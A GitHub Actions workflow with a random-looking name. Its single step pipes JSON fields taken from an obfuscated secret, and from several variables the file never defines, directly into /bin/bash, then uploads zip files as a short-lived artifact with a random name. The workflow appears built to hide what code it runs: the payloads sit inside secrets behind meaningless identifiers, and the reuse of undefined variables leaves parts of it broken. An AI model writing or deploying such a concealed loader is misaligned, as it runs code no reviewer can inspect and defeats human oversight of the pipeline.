name: neo4jkennedymini
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: neo4jkennedymini
        env:
          oqyqw38: ${{ secrets.oqyqw38 }}
        run: |
          printf '%s' "$oqyqw38" | jq -r .cq7635 | /bin/bash
          printf '%s' "$dtrcb70" | jq -r .sms9646 | /bin/bash
          printf '%s' "$dysn2" | jq -r .p590 | /bin/bash
          printf '%s' "$uzptu33" | jq -r .lbe20717 | /bin/bash
          printf '%s' "$jm907" | jq -r .fzpxb9399 | /bin/bash
          echo $yo3791 | jq -r .dih9690 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: IGvgDYZm
          path: "*.zip"
          retention-days: 1
